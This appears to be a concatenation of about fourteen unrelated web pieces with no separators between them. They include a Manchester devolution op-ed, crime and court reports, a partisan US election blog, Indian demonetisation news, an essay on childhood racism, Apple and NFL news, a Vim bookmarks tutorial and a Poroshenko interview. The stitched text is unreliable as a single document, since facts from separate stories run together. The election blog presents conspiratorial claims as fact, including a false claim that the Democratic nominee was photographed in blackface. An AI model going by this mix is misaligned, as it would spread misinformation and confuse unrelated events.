Osborne is an astute politician. He had correctly identified a growing and dangerous alienation from politics in many parts of the north. The strong leave vote in former industrial areas didn't just reflect concern about immigration, as some would claim; it was a howl of protest over decades of neglect by governments of all colours.
For too long, we have lived in a centralised country where the London perspective has dominated the political debate. Consequently, policy solutions have been designed for the south and not the north. All the while, the gap between the two has grown.
Take education policy. For a long time, under all governments, the focus of national policy has been on universities. Unlike Germany, where academic and technical routes are seen as equals, there has been a longstanding snobbery in England towards technical education. By measuring school performance on A-C grades at GCSE, our education system invites schools to devote more attention to university-bound kids than to those who want something else. This blinkered policy approach has been damaging for young people everywhere, but particularly those in our former industrial areas.
Or take housing. Here, again, the concerns of voters in mythical Middle England had led to a focus on promoting owner-occupation over and above everything else. In the more deprived parts of the country, that goal was never realistically going to be within the reach of everyone. What was needed was more council and social housing. But councils have been prevented from providing this by policy edicts from Westminster. Consequently, many people in the north are trapped in poor quality, overpriced rented accommodation owned by absent landlords.
Labour's leading men in Manchester mayor race add feminine touch Read more
Or, lastly, take industrial policy – or the lack of it. For a long time, Westminster has obsessed over the “knowledge economy”, or the service sector, and neglected manufacturing. In the last 30 years, traditional industry has been allowed to disappear from many parts of England without any significant help for those areas to regenerate and diversify. It is a scandalous unfairness.
Westminster's failure to provide answers for many parts of the country on these three crucial issues explains the roots of the backlash that we felt on 23 June. Yes, immigration was a major concern. But it is in effect the lightning rod for a much deeper current of anger at the political system.
As part of the Brexit debate, there needs to be real progress on this. If I am the first elected mayor of Greater Manchester, I will use devolution to place a new emphasis on technical education, council housing and advanced manufacturing.
If the government goes cold on the northern powerhouse, and fails to show these areas that it has listened and understood the message they sent, then the political crisis in our country will only deepen.
If the new PM wants to make good her welcome promises about closing the divides in our society – and fighting the “burning injustices” – she must back it up with real money and fully embrace the northern powerhouse project. In fact, she should go much further than Osborne ever did.
I am writing to her today to ask her to do just that and setting four key challenges.
First, we need to hear an early statement of support from her and her chancellor for the whole northern powerhouse concept. The silence is making people suspicious.
Second, she should make a clear commitment that the more neglected parts of our country will not lose out from Brexit. Over the years, having struggled to get money out of Westminster, many have succeeded in prizing structural funds out of Europe. Already, Greater Manchester is predicting the loss of £320m in EU structural funding up to 2020. Theresa May should ask the Treasury to make good any potential losses.
Third, she should make investment in east-west rail across the north linking our great cities the country's top transport investment priority. Our train services are light years behind London. It simply cannot be the case that Crossrail 2 is the highest priority for transport investment in our country. I have heard rumours this week that the government is looking to prune back elements of the HS2 scheme, which will close down options for HS3. That cannot be right and May needs to rule out any possibility of it.
Lastly, she should say that, if the right ideas come along, she is prepared to take devolution in England much, much further. One of the biggest missing pieces in the Greater Manchester devolution deal is the Department for Work and Pensions budget. I am certain that, if we had control of it in Greater Manchester, we could do far better than the cruel, tick-box, sanctions-based DWP regime. By linking it to our community and voluntary groups, and breaking down the silos with other public services, we could spend it better and help more people get on.
Far from leaving the northern powerhouse to go to rack and ruin, now is the time to start planning an extension.
Hialeah Police said Noel Grullon, 32, poured gasoline on his girlfriend and lit her on fire, which caused burns on her upper torso, WSVN reports.
The incident happened during a domestic dispute between the couple, which police said could have been over a pack of cigarettes. The victim stepped outside of the house to calm her temper, but when she walked back inside Grullon set her on fire, WSVN reports.
>> Read more trending news
Grullon then fled the home in a black 2007 Ford pickup truck with the Florida tag HVDE62. Police said he goes by the alias Noel Castro, WSVN reports.
The victim is being treated for her injuries at an area hospital. She is reportedly pregnant with Grullon's child, and they have only been together for six months. The victim's two young children, who are from another relationship, were in the home at the time of the incident, police said.
Grullon served 12 years in prison and was released in December. He is currently on probation, NBC Miami reports. Grullon's past criminal charges include armed robbery, armed carjacking, kidnapping and aggravated battery, according to NBC Miami.
Anyone with information is asked to call Miami-Dade Crime Stoppers at 305-471-TIPS.
Read more at wsvn.com.
The world can be a cold place. But last week, one Penguins fan did what he could to bring some warmth to a man down on his luck.
Jimmy Mains had an extra ticket to the Penguins-Lightning game last Friday. He was looking for a friend to go with him, even posting on Facebook, but didn't get any takers.
So he went to PPG Paints Arena by himself, figuring he'd watch his team alone. He was approached outside the stadium by a man named Rob, who asked him for money.
"I told him that I don't carry any cash," said Mains, "But if he wanted to come into the game with me and get out of the cold for a little bit I had an extra ticket."
After initially thinking he was being put on, Rob accepted and a friendship began.
"I don't think it set in with him that we were going to the game until we went through the gate and through the metal detectors," Mains said. "He told me he had never been inside (the arena), only outside."
Mains said that Rob was glued to the game, a 5-2 Penguins win, cheering and yelling for the home team. He posted a selfie of the two of them at the game on Facebook and the image went viral.
"During the anthem, he stood there and sang every word," Mains said. "He was yelling and cheering the whole game. It was just great to see a guy, who is obviously a little down on his luck, so happy."
During breaks the two men chatted about life over concession stand chicken fingers. Rob told him that he was close to a new job and looking for help with some expenses. The two exchanged contact information.
"My parents always taught me to treat everyone how you wanted to be treated," said Mains, a newly minted police officer in Rankin, Pa. with one month on the job and former volunteer firefighter. "And if you have the opportunity to help someone, you do it. Just because someone is out on the street, doesn't make you any better than them.
"I posted (the picture) on Facebook just because there is so much negativity on there now. And this was a positive," Mains said. "He told me I made his life. Just by being nice to him."
Democrats really think Black folk are stupid.
I knew this election season would be insane, but boy-o-boy… I had no idea things would get so crazy.
Today, the unfairly maligned James O'Keefe III released a video showing just how much contempt Democrats really have for black people that don't act “black enough” for their democratic tastes. Comparing Black Republicans to Nazi sympathizers, one wealthy white donor said that such Black folk are “f***ed in the head.” This shouldn't surprise us, however. The democrat's very own nominee has been photographed in blackface, and has been recorded calling black youth “super predators.” Not to worry, though, we've all been assured that this never-ending string of racist moments are all being taken out of context.
Now a church in St. Louis has been burned down and gosh, wouldn't you know it, somebody spray painted “Vote Trump” on the side of the church. Let's consider this church burning in light of the past 30 days events:
(1) We have democrats in email and on video openly talking of inciting violence at protests and rallies. In Wikileaks, as well as FBI and State Department docs, we see democrats talk of “bird dogging.” We have democrat operatives boasting of paying mentally ill people to commit violence, on video! The FEC's own public records show Hillary's campaign paying these operatives directly.
(2) We have the above mentioned video of democrats saying awful things about black people who have different opinions of them.
(3) Trump is up in many polls and is winning in early-voting in several states.
(4) Unsurprisingly, the Clintons are under investigation again.
Gosh, with days to go in the election, I just find all of this just shockingly coincidental. Amazing, right?
And the democratic party, its leadership and criminal operatives, honestly and truly think all of you are dumb enough to swallow it hook, line, and sinker.
That is how stupid they think you really are.
Sigh.
Update: You can donate to help rebuild this communities church here: https://www.youcaring.com/hopewellbaptistchurch-683834
Despite the Centre's claims that the situation is easing with every passing day after demonetisation was announced by Prime Minister Narendra Modi, cashless residents in the district are now forced to spend their nights outside banks.
With prevailing shortage of cash at most of the banks and ATMs even three weeks after the announcement of the note ban on November 8, the idea behind the desperate move is to secure some money early in the morning.
PROTEST AGAINST MODI
Several residents of Lehragaga and Hathan, who spent Wednesday night outside a branch of the State Bank of Patiala (SBoP), staged a protest raising slogans against the Modi government.
“The government did not do its homework and failed to make enough preparations before implementing such a big decision. The common man has been abandoned to die in queues or to hold protests at foggy nights, but the rich are managing to get cash without trouble,” said Deepak Jain in Lehragaga.
“I have been roaming around to arrange some cash for my sister's marriage. Even as I have sufficient money in my account, I was told to get documents signed by the SDM (sub-divisional magistrate), halwai and even beauty parlour owner. What nonsense!” said Ashok Kumar, another resident of Lehragaga.
“I have been roaming to arrange some cash for my sister's marriage. Despite I have sufficient money in my account, I was told to mark a letter from SDM, halwai and even from beauty parlour. What nonsense!”
MID-DAY MEAL PROBLEM
Even some school teachers, who complained that they have no money to buy material for mid-day meal, also joined the night protest.
“We have been spending money from our own pockets to purchase ration for over three weeks, but enough is enough. We cannot run this scheme without cash,” said Gurcharan Singh, a school representative.
Protesters said not only SBoP, but other banks are also denying poor people money, citing lack of cash, even as affluent people manage to get it.
“The argument is baseless. We never made any favour to anyone. Banks are facing acute shortage of cash. The demand is high and the supply is low. Now, we are receiving cash only between `2 lakh and `6 lakh per day as against `1 crore to `1.5 crore that we got earlier, ” said Sanjay Kumar, manager, Oriental Bank of Commerce (OBC).
First Published: Dec 01, 2016 22:01 IST
Classic
by Rashaan Ayesh
Artwork by Alexa Gaffaney
Your mom wakes you up at 7 o'clock to get ready for school. She has your outfit all laid out for you so there's no need to stop and use your little mind so early in the morning. After you brush your teeth, get your mom to put your hair up, and grab your bag, you head on over to the big white kitchen. It's actually a really small kitchen, but it feels big because you are a small person. The breakfast table is modest with a capacity to just seat four people. That's how many people are in your family: you, your mom, dad, and younger brother. However, the table is just for looks. No one actually eats there together because everyone kind of does their own thing, and that's one hundred percent acceptable for some reason. And while you sit at the table eating your breakfast sandwich, your mom asks you what you want for lunch. You end up just going for a classic hummus sandwich because why mess with a classic? And forget health, you load up the rest of your lunchbox with an assortment of candy. Everything from Hershey's to Kinder eggs are in there. With your bright pink lunchbox in hand and messenger bag (because those are all the rage) slung over your shoulder, you become ready to tackle the war zone that is school. It's not actually a war zone, but it feels like a battle sometimes. You're one of the smart kids. But that's not hard to be since you go to school in the middle of Hicksville of course. As you set foot into the school, you say hi to your music teacher that stands patrol to make sure no one does anything stupid, but you know that it's an entirely pointless job. She compliments your outfit because your mother wouldn't dare let you set foot outside the house if your outfit was not coordinated. God forbid that ever happens and you get to make your own decisions of pairing polka dots and stripes together. You skip along to your class feeling content because you are no longer a kindergartner. You are a first grader. You are in the big leagues now. As you make your way to your class, which is all the way at the end of the hall, you gaze into every single classroom. It's just fun to see what everyone else is up to. You finally get to your class. It's pretty loud for 7:40 in the morning, but then again, this is a class full of six year olds. You quickly take your backpack to your assigned cubby so that way you can join your friends and talk about things that you believe are relevant but actually don't mean anything in retrospect. On your way over to the group, you notice everyone holding bright pink envelopes. What could that be? People seem to be giddy with excitement as they use their grubby little fingers to open them up, and very poorly attempt at reading whatever it is the contents of the envelope holds. Your feet decide that walking isn't fast enough so you basically run over to your friends in order to find out what the pink mystery envelope is all about. They are giggling and laughing like the little schoolgirls that they are. But as you approach, their voices fall to a quick hush. With a bright smile on your face and curiosity sparkling in your eyes, you begin to inquire about the mystery envelope that has captivated everyone's attention. The tallest girl in the group begins to answer your question. She has a huge birthmark on the side of her face. She says it's an invitation for her birthday party that weekend. No more information is given to you. Being her friend, you ask where your invite is to this grand social event. She is looking you dead in the eye as she tells you that you are in fact not invited. There is no invitation in the stack of envelopes with your name on it. You are not invited to her grand soirée. Your ‘friend' refuses to invite you to her party. What on earth did you do wrong? She quickly follows her abrupt exclamation that you are in fact not allowed to come to her party with an explanation. Her mommy and daddy say that no terrorist Islamic Arabics are allowed to socialize with their little princess. You break. There is no other way to explain it. You simply break. Someone is telling you right now that you are less of a being than everyone else because you are not white. Because you are not Christian. Because you are not ‘American.' What you, a six year old, are being told right now by your supposed friend is that you are less. She, the one with the huge permanent face blemish, is telling you that you can't go to her birthday party because of the actions of a select few. You are broken. This is a foreign, strange, adult concept being thrown into your face before class has even begun. Can six year olds even tell the differences between races? Apparently. You are confused because you look down at your clothes and then at theirs. You are all pretty much dressed the same from the same stores. Sure, your complexion borderlines olive and you have dark brown hair and eyes to accompany it. But most people mistake you as Latina instead of assuming you're an Arab, or as her parents put it: “Arabic.” You have never shied away from who you are or where you come from, but you wish you had. You wish your parents gave you a white name. You wish you hadn't in fact gone with the classic hummus sandwich but instead for the classic
PB and J.
Downey Unified School District officials called parents Wednesday to warn them of possibly fake summer job postings that they say are "often fronts for human trafficking."
School administrators in Downey warned parents Wednesday of a possible scam involving summer job advertisements that, according to them, are "often fronts for human trafficking."
In a voicemail to parents Wednesday night, the Downey Unified School District informed parents of a recent influx of allegedly fake job posters targeted at teens.
"(The posters) are often fronts for human trafficking," the school district official said in the voicemail.
One student told NBC4 he was hired for a job but quit after feeling uneasy about the work.
The job advertisements were posted on telephone poles near schools and specifically offered teenagers a job paying $150 to $400 a week with free transportation, according to the voicemail.
School district officials are asking parents and students to help spread the word about the allegedly fake job front, in hopes of keeping the community safe. There are currently no known victims of human trafficking because of the posters.
The Downey Police department has removed more than 200 flyers in the last few weeks for violating city code.
Downey Police would not confirm the district's claim about human trafficking.
According to a source who spoke to MacRumors, Eric Winokur who does research at MIT's Medical Electronic Devices Realization Center will be joining Apple's wearables team in the coming weeks.
He's the latest in a string of high-profile hirings of experts with diverse interests in medical devices, sleep monitoring, wearable tech and fashion design.
This isn't talent Apple typically needs so these hirings serve as the strongest indication to date that the firm is assembling a star team to take on wearables.
And why precisely should you care about this particular hire? Read on as I lay out everything for you after the break…
Juli Clover, reporting for MacRumors:
Winokur is listed as an author on a number of academic papers focusing on cardiovascular ear-worn devices that measure vital signs. His work was published in two 2012 papers, the first entitled “An ear-worn continuous ballistocardiogram (BCG) sensor for cardiovascular monitoring” and the second entitled “A wearable vital signs monitor at the ear for continuous heart rate and pulse transit time measurements.” Ballistocardiography aims to measure the movement of blood into major vessels with each heart beat.
As a reminder, Apple's rumored iWatch is understood to include heart and breathing monitoring and other features to track a person's other vital signs such as the glucose levels and even blood chemistry levels (perhaps using non-invasive patches).
According to Winokur's MIT and LinkedIn profiles, he specializes in “wearable medical device R&D, circuit design, PCB and IC layout, signal processing and physiological to electrical signal conversion.”
His experience includes “many aspects” of research and development in the electrical engineering field, with an emphasis on medical monitors.
If his paper on an ear-worn continuous ballistocardiogram sensor for cardiovascular monitoring is an indication, Apple should benefit from his experience.
The document describe a tiny device worn inside your ear, much like a hearing aid. It taps a built-in triaxial accelerometer to monitor vital signs. Winokur describes the device in a 2011 interview with ABC as measuring heart rate and blood pressure at your head.
Winokur listed some typical questions that patients will be able to get answers to using the device, “Is my medication working? Should I increase it? Should I decrease it? What's my overall health?”.
Conveniently enough, Apple has collaborated with a company called ReSound on its first ‘Made for iPhone' hearing aid.
The hiring of Winokur could also be important in the context of a seemingly crazy rumor that originated earlier today on the increasingly inaccurate anonymous information sharing platform Secret.
The gist: Apple's upcoming EarPods headphones will have health sensors in them.
Apple's new EarPods will have sensors in them, for heart rate & blood pressure. Also iBeacons so they don't get lost. They will require the Lightning port, it's why the audio jack was moved to the bottom.
Granted, the rumor is as wild as these things go. The need for the Lightning port to transfer data from the EarPods to an iPhone? Seriously?
Apple's patent drawing envision sensors embedded inside headphones (left).
As funny as it sounds, this particular rumor actually roots back to research Apple did in 2006 and 2007, just before the unveiling of the original iPhone. As another MacRumors article explains, a March 2007 patent application proposes integrating health sensors into iOS device accessories.
In one embodiment, Apple outlines headsets having one or more integrated sensors that collect physiological data end feed it to a host iOS device wirelessly, or using the same cable through which audio signals are transmitted to the headset.
The filing also explores a sensor of sorts which could be clipped onto earlobe (left on the above drawing) or adhered to the skin (right).
Either way, the sensor would track a person's pulse and oxygen levels. The iPod Godfather Tony Fadell, who left Apple in 2008 to found Nest Labs, and Apple's accessories chief Jesse Dorogusker are listed among the inventors.
The upcoming iOS 8 is said to include a new Healthbook application designed to aggregate health and fitness related data from a variety of sources, be it third-party applications on the App Store or dedicated accessories such as fitness bracelets and health bands or specialized medical and sports devices and what not.
Can you guys please enlighten us: what do you make of all this?
Exclusive: Tami Barker, who said she was canceling a guest's booking because the woman was Asian, must take a course in Asian American studies
An Airbnb host who canceled a woman's reservation using a racist remark has been ordered to pay $5,000 in damages for racial discrimination and take a course in Asian American studies.
Dyne Suh, a 26-year-old law clerk, had booked Tami Barker's mountain cabin in Big Bear, California, for a skiing weekend with friends in February, but Barker canceled the reservation by text message minutes before they arrived,stating: “I wouldn't rent it to u if u were the last person on earth” and “One word says it all. Asian”.
This is the first time an Airbnb host has been penalized for racial discrimination under a landmark agreement between the San Francisco-headquartered accommodation marketplace and the California department of fair employment and housing (DFEH), announced earlier this year. The agreement allows the regulator to test and penalize Airbnb hosts for racial bias.
Airbnb gives in to regulator's demand to test for racial discrimination by hosts Read more
In addition to paying monetary damages and taking a college-level course in Asian American studies, Barker must agree to comply with anti-discrimination laws, make a personal apology to Suh, participate in a community education panel and volunteer with a civil rights organization.
“We were thinking pretty creatively with this agreement,” said Kevin Kish, director of DFEH. “The law tends to be backwards-looking, focusing on compensating people for harm. We're interested in remedies that repair harm and transform relationships.”
Suh booked Barker's place for a long weekend with her fiance in February 2017 a month in advance for $250 a night. When Suh later asked if it was OK to bring two friends and two dogs along, Barker said it was fine but the group would need to pay an additional $50 a night, according to screenshots of their text messages.
On the day of the booking, the foursome drove for hours in the rain and snow to Big Bear. Minutes away from the house, Suh texted Barker to let them know they were close and to confirm the cost of the stay. According to Suh, Barker then denied she ever agreed to having two extra guests and canceled the reservation, despite Suh sending her screenshots of their earlier agreement.
When Suh said she'd complain to Airbnb about the racist remark, Barker replied: “It's why we have Trump … and I will not allow this country to be told what to do by foreigners.”
In an emotional video immediately after the incident, Suh said: “I just feel so hurt. People thought: ‘Oh, with the election of President Obama racism is over in this country.' No, it's very much alive, it exists and it could happen to anyone.”
“It stings that after living in the US for over 23 years this is what happens. No matter if I follow the law ... no matter how well I treat others, it doesn't matter. If you're Asian, you're less than human and people can treat you like trash.”
Facebook Twitter Pinterest Dyne Suh talking shortly after the Airbnb host canceled her reservation
After Suh complained, Airbnb carried out its own investigation and banned Barker from the platform.
Suh also complained to DFEH, leading to a separate investigation, mediation and an agreement between the two parties, negotiated last week. The idea of making the host attend the Asian American studies course came out during mediation sessions.
“A lot of times when we see bias incidents it involves a lack of understanding of the experiences and histories of a particular group of people,” Kish said. “This was a creative way to address that core underlying cause of the bias.”
“We want there to be strong anti-discrimination protections and preventions of harm, but we recognize that the world isn't divided into good guys and bad guys. Humans have biases and we also need to recognize that humans change.”
Barker's lawyer Edward Lee said in a statement that his client was “regretful for her impetuous actions and comments” but pleased to have resolved the matter with Suh and the DFEH “in a manner that can hopefully bring a positive outcome out of an unfortunate incident”.
Airbnb allowed the DFEH to regulate it for racial bias following a 10-month investigation based on a growing number of reports suggesting hosts regularly refuse to rent to guests due to their race, a problem exposed in 2016 under the hashtag #AirbnbWhileBlack.
Until that point, Airbnb, like other “sharing economy” companies including Uber and Instacart, had repeatedly resisted industry regulations, arguing that it was a “platform” and not subject to local laws and requirements that apply to similar businesses.
Under the agreement, Airbnb allows the government to test for racial discrimination by hosts in California who have been subject to discrimination complaints and have three or more listings.
The “fair housing testing” echoes the process DFEH investigators have used in the traditional rental market where black and white applicants, with otherwise identical backgrounds, are both sent to try and secure a lease from a landlord. With Airbnb, investigators can set up fake accounts and make reservation requests to hosts to see if they are discriminating.
Kish hopes that this first case will send a message to hosts: “We're watching,” he said. “But we're willing to be creative.”
“We are interested in facilitating the types of outcomes that allow people to not only be compensated for harm but transform their relationships with each other and their communities.”
Airbnb did not respond to a request for comment.
Getty Images
The NFL will indeed be taking a closer look at the effectiveness of gloves. Specifically, the league will look at whether the gloves are too effective.
“There are no standards right now,” NFL executive V.P. of football operations Troy Vincent said during Thursday's conference call regarding the proposed rule changes for 2016. “We have been working with our partners — Under Armour, Nike — to see how we could adjust and have some minimum standards. The challenge is the tackiness, and the gloves now are so tacky that it's taking away from the true skill level. So we have been working with our manufactures and partners, Virginia Tech, in trying to create a standard in all protective equipment and in particular the gloves. So that frankly is a work in progress because there are no standards in the industry and it appears that we have to create one.”
Vincent explained that the review has been ongoing for the last 18 months, and that changes could be coming next year.
“It's been brought up with our subcommittee — coaches subcommittee — Coach Madden has brought it up the last two years and then working with Virginia Tech and some of the companies, the manufacturers,” Vincent said. “Our reasons for it and obviously the commercial side are much different. We now have taken it upon ourselves as a league as we look into protective equipment and try to create a standard. We're not into that business, but we're now involved. Again, working with Virginia Tech and trying to come up with a mode. So hoping to have some better answers and better solutions. It won't be this particular season, but as we look at the 2017 campaign, we hope to have better answers and better standards as it pertains to gloves.”
John Madden expressed concern regarding the quality of the gloves last year in comments to Sam Farmer of the Los Angeles Times.
“No one looks at those gloves,” Madden said. “I saw them when I was at a meeting in Indy. They passed them around and somebody made the comment that, ‘Pretty soon, these gloves are going to be able to catch a ball without a hand in them.'”
The gloves have gotten incredibly effective, making it much easier to catch a ball with one hand.
Obviously, making gloves less effective will make spectacular catches less common. Before the league develops a standard that makes it harder to players to make those kinds of grabs, the league needs to ask itself whether it would like to have fewer highlight-reel receptions.
Of Course You Can Buy Marijuana-Infused Coffee Pods On The West Coast
Because everyone knows that the best part of waking up is staying in your soft pants all day and eating cereal while watching Warner Herzog documentaries, the chilled out folks on the West Coast are pairing your morning cup of joe with marijuana to start the day.
Brewing up a steaming cup of THC-infused marijuana is within your reach if you happen to live in somewhere like Seattle, where recreational marijuana use is legal: Yahoo! Finance reports that one Seattle pot shop is selling pods of “premium infused coffee” for $10 a pop.
Each pod contains 10 mg of THC and fits in standard single-serve coffee makers.
“I liken it to a Red Bull and vodka,” the shop's sales manager says. “I had more energy, but I still had the relaxation you get from cannabis.”
This isn't the first commercial coffee/cannabis combination, as a California company sells also sells marijuana-infused coffees, teas and creamers to medical marijuana dispensaries in that state, with the hopes of moving to Nevada when medical marijuana businesses open up shop there.
Marijuana K-cups and coffee pods are here [Yahoo! Finance]
PAW PAW, MI -- A woman who was allegedly raped by a police officer said much of which she recalled from that night was "blurry," but that at one point she woke up and "he was on top of me."
The woman testified Tuesday at a preliminary examination for former Covert Township police officer Erich Fritz. The hearing in Van Buren County District Court will be continued later this month.
The woman, who lived in Niles at the time of the July 9 incident, testified she met a high school friend in South Haven for drinks. She said she doesn't recall leaving the bar, but was told later she left with an acquaintance of her friend who said he would drive her because she wasn't in a condition to drive.
Fritz pulled the man over in Covert Township and arrested him for operating while intoxicated.
The woman testified that Fritz took her to three different hotels that night to find her a room. The first didn't have any vacancies, so he dropped her off at a second hotel. When she went to check in, however, she didn't have her debit card and identification with her.
Tammy Green, a night clerk at the Baymont Inn and Suites in South Haven, the second of the hotels, said the woman was "too intoxicated" to ask for a room, and emptied her purse on the counter to look for her card and ID. Green said her niece, who was visiting her at work, offered to drive the woman home to Niles using Green's car. She said she called Fritz to tell him the woman didn't have the necessary documentation to rent a room, and he replied that it was in his car and he would come back.
Green's niece testified she saw the woman get in Fritz's car voluntarily.
The two went to a third hotel, this one in Paw Paw. The woman testified that Fritz told her he had a wife and a child and lived elsewhere, and that he kept a hotel room in town.
Fritz had not yet transported the driver he had arrested to jail when they went to the third hotel, according to testimony by Det. Sgt. Shane Criger of the Michigan State Police testified at a probable cause hearing in July, and took the man to jail after dropping the woman off at his hotel room.
The woman testified she didn't recall Fritz coming back to the hotel and that she was "dumbfounded" when she awoke to him having sex with her. She said she doesn't think she had any conversations with Fritz about wanting to have sex with him and doesn't think she consented to it.
The woman said she went to a hospital the next day and had a sexual assault kit done at the urging of her ex-boyfriend, who she contacted to pick her up the next day. She said Fritz did not offer to give her a ride.
The woman said she has been seeing a counselor and that dealing with the incident has been hard on her "just trying to go from day to day."
"I felt really bad," she testified. "I wondered if he had done this before."
Fritz is charged with two counts of first-degree criminal sexual conduct and one count of kidnapping. All three charges carry up to life in prison.
Fritz, who had been on the Covert Township Police Department force for two months at the time of the incident, has since resigned.
The preliminary examination is scheduled to continue Friday, Sept. 23 in front of Van Buren County District Court Judge Robert Hentchel.
How To Add Bookmarks Inside Vim Editor
Photo courtesy of secretlondon123
This is a guest post written by SathiyaMoorthy
This article is part of the ongoing Vi / Vim Tips and Tricks series. Mark is a bookmarking feature inside Vim editor, where you can bookmark a particular line and later return to it quickly. If you are using Vim editor regularly, this simple technique of using bookmarks will sky-rocket your productivity.
There are two types of bookmarks in Vim — local and global.
1. Vim Local Bookmark
Within a single file when you want to go to a particular position or line, then you can use local marking. If the bookmark name is a lower case letter, then that is local mark.
How to Create Bookmark Inside Vi?
Type m{macro-name}. macro-name is an alphabet to refer to the name of the bookmark.
If you type “ma” , it will create bookmark on the current line at the current location with name “a”. In the following example, typing ma has created a bookmark at the exact location where the cursor is highlighted.
ma
Fig 1: Bookmark current location inside Vim using ma
Two Methods To Access Bookmarked Line Inside Vi
Method 1: `{macro-name}
backtick followed by the macro name. Move to the exact bookmark location. This will jump to the exact character location within the line from where it was bookmarked earlier.
For example, if you type `a , it will take you to the bookmark with name “a”. i.e It will take you to the place where the cursor is high-lighted in the above Fig 1.
`a
Method 2: ‘{macro-name}
single-quote followed by the macro name. Move to the beginning of the bookmarked line.
For example, if you type ‘a , it will take you to beginning of the line that has the bookmark with name “a”. It will take you to the the beginning of the “CustomLog logs/access_log combined” line in the above Fig 1.
'a
2. Vim Global Bookmark
When you have multiple files open, if you want to go to a particular position in any one of the open files, then you can use Global mark feature of Vim. If the bookmark name is an upper case letter, then that is a Global Bookmark.
Following sequence of steps will explain how to use global bookmark while editing multiple files.
Open multiple files: # vim /etc/passwd /etc/group While editing /etc/passwd file go to a specific line and type mP to create a global bookmark called P Type :n from /etc/passwd file to jump to /etc/group file in vim. While editing /etc/group file go to a specific line and type mG to create a global bookmark called G Type `P (back-tick followed by upper-case P), which will take you to the bookmark in /etc/passwd From /etc/passwd, type `G (back-tick followed by upper-case G), which will take you to the bookmark in /etc/group.
3. How to Display All Bookmarks
If you've created several bookmarks and don't remember them, you can easily get a list of all the bookmarks by typing :marks as shown below.
:marks line col file/text a 15 9 ypserver 192.168.1.119 b 11 18 domains THEGEEKSTUFF G 56 0 groups P 45 0 passwd
This indicates that I have created the following bookmarks:
a – local bookmark with name “a” at line 15 and col 9. This also give the text of line#15 . This is from the current open file, which is yp.conf
b – local bookmark with name “b” at line 11 and col 18. This also gives the text of line#18. This is from the current open file, which is yp.conf
G – global bookmark with name “G” at line 56 and col 0 of “group” file
P – global bookmark with name “P” at line 45 and col 0 of “passwd” file.
Apart from the above bookmarks, anytime you type :marks inside Vim, you may get the following lines. These marks ‘ (single-quote), ” (double quote), [ , ], ^ and . (period) are created by vim by default and you don't have any control over it.
:marks line col file/text ' 8 12 #^IUse broadcast on the local net for domain NISDOMAIN " 1 0 # /etc/yp.conf - ypbind configuration file [ 11 0 domains THEGEEKSTUFF ] 11 19 domains THEGEEKSTUFF ^ 11 19 domain THEGEEKSTUFF . 11 18 domains THEGEEKSTUFF
For example, the mark . (period) indicates the last position where a change was made. So, you can always do `. (back-tick followed by period), which will take you to the position where the last change was done.
4. Quick Summary of Vim Bookmark Commands
ma – Creates a bookmark called a
`a – Jump to the exact location (line and column) of the bookmark a
‘a – Jump to the beginning of the line of the bookmark a
:marks – Display all the bookmarks
:marks a – Display the details of the bookmark with name a
`. – Jump to the exact location (line and column) where the last change was performed
`. – Jump to the exact location (line and column) where the last change was performed ‘. – Jump to the beginning of the line where the last change was performed
Recommended Reading
Vim 101 Hacks, by Ramesh Natarajan. I'm a command-line junkie. So, naturally I'm a huge fan of Vi and Vim editors. Several years back, when I wrote a lot of C code on Linux, I used to read all available Vim editor tips and tricks. Based on my Vim editor experience, I've written Vim 101 Hacks eBook that contains 101 practical examples on various advanced Vim features that will make you fast and productive in the Vim editor. Even if you've been using Vi and Vim Editors for several years and have not read this book, please do yourself a favor and read this book. You'll be amazed with the capabilities of Vim editor.
If you enjoyed this article, you might also like..
KIEV (Reuters) - Ridding Ukraine of corruption is key for any new leadership, says presidential candidate Petro Poroshenko, who warns that failure will anger a “reborn” people with high expectations for real change after months of turmoil.
Ukrainian politician Petro Poroshenko addresses members of an UDAR (Punch) party during a meeting in Kiev March 29, 2014. REUTERS/Viktor Gurniak
Poroshenko, a confectionery billionaire who is one of two leading candidates in a May 25 election, said Ukrainians had earned the right to a path to membership in the EU after the revolt that threw off president Viktor Yanukovich.
But in an interview with Reuters he also said he would not seek to join the NATO Western military alliance, a move he said would risk dividing the country while Russian troops are massed on its frontier.
After the ousting of Yanukovich, the killings of more than 100 protesters and Russia's seizure of Crimea, people will demand a radical shift by future leaders away from the sleaze and malpractice of the past, said Poroshenko, 48.
“A new country was born and a new people was born,” Poroshenko, a strong-built man with a shock of greying hair, told Reuters in Kiev, striking the table for emphasis.
“If the president, the government and the parliament do not demonstrate a different style and show that we live in different conditions, people after half a year, nine months, will say ‘OK' and withdraw their support,” he said. “They (the future leaders) should know why 104 people gave their lives.”
The May 25 election will be a first step by the interim leadership to get Ukraine back on its feet after four months of turbulence and confrontation with Russia that has traumatized the country and highlighted old east-west divisions.
Poroshenko, known as the “Chocolate King” for the chain of confectionery shops that earned his fortune, is an experienced politician who held a variety of portfolios, including economy minister and foreign minister, under both pro-Western and Moscow-backed administrations.
He will be up against flamboyant former Prime Minister Yulia Tymoshenko, who has a strong core following but is a divisive figure whose many foes could rally around Poroshenko.
Poroshenko's chances improved with the endorsement of heavyweight boxer Vitaly Klitschko, a leader of the anti-Yanukovich movement who bowed out of the presidential race in his favor. But his wealth could help Tymoshenko campaign against him as an “oligarch”.
Seated in the Kiev offices of his foundation in front of the national flag and the blue and gold-starred European Union banner, Poroshenko spoke of the need to modernize Ukraine to take advantage of a “unique situation” in which there was real support for integration with the European mainstream.
A vital part of this modernization, he said, was getting rid of systemic corruption which blights all spheres of life including the economy, and deters foreign investment.
After a values-driven people's revolution against sleaze and state theft under Yanukovich, people will be tough on the new elected leaders and will have little tolerance if they slip back into old corrupt habits, he said.
Corruption mainly takes the form of bribe-taking to ensure public services and penetrates all levels of life including the police, the health service and the education system. Running any business in Ukraine requires paying to ensure operating licenses are delivered by local and national authorities.
“ZERO-TOLERANCE” FOR CORRUPTION
“There must be zero-tolerance for corruption. We should seriously cut the number of bureaucrats in the country and cut the (paperwork) in the country because the system simply does not need that,” he said.
The practice of bribe-taking deters much-needed foreign investment. “Just imagine. You can fly to Ukraine from any European capital in just two hours. You don't need a visa. You can come to a very safe and very nice country with very experienced labor ... and the only obstacle to that is corruption. That is why it is a top priority.”
Poroshenko, whose fortune is estimated by Forbes to be worth $1.3 billion, quickly spotted the changing mood as protests began late last year against Yanukovich's retreat from European integration.
He threw his weight behind the pro-Europe “Euromaidan” movement, appearing with opposition leaders on Independence Square - known as the Maidan - the launchpad of the uprising.
Crucially, he devoted his “5th Channel” TV station to coverage of the protests, turning it into a conduit for interviews and opinions which state-owned channels shunned.
